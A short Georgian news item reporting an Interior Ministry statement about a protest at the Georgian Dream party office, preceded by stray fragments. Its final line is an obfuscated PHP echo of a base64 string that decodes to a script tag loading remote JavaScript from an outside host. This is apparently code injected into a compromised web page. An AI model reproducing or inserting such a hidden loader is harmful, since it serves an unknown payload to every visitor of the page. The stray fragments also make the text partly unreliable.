celsiusi
ავერსი შნაიდერი
შინაგან საქმეთა სამინისტრო „ქართული ოცნების“ ოფისთან მიმდინარე აქციასთან დაკავშირებით განცხადებას ავრცელებს.უწყება აქციის ორგანიზატორებს მოუწოდებს, არ დაუშვან ძალადობისკენ მოწოდებები და უზრუნველყონ, რომ აქციებმა არ მიიღოს ძალადობრივი ხასიათი.
 
„შინაგან საქმეთა სამინისტროს თანამშრომლები თბილისში, პარტია „ქართული ოცნების“ ოფისთან მიმდინარე აქციასთან დაკავშირებით მობილიზებული არიან და იცავენ საზოგადოებრივ წესრიგს. მოვუწოდებთ აქციის მონაწილეებს, არ გასცდნენ შეკრების და გამოხატვის თავისუფლების კანონით დასაშვებ ფარგლებს. ამასთან, ვაფრთხილებთ აქციის ორგანიზატორებს, არ დაუშვან ძალადობისკენ მოწოდებები და უზრუნველყონ, რომ აქციებმა არ მიიღოს ძალადობრივი ხასიათი. შინაგან საქმეთა სამინისტრო უზრუნველყოფს საზოგადოებრივი წესრიგის და უსაფრთხოების დაცვას. სამართალდარღვევის ფაქტებზე სამინისტრო შესაბამის სამართლებრივ რეაგირებას მოახდენს“, - ნათქვამია შინაგან საქმეთა სამინისტროს განცხადებაში.
1139
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");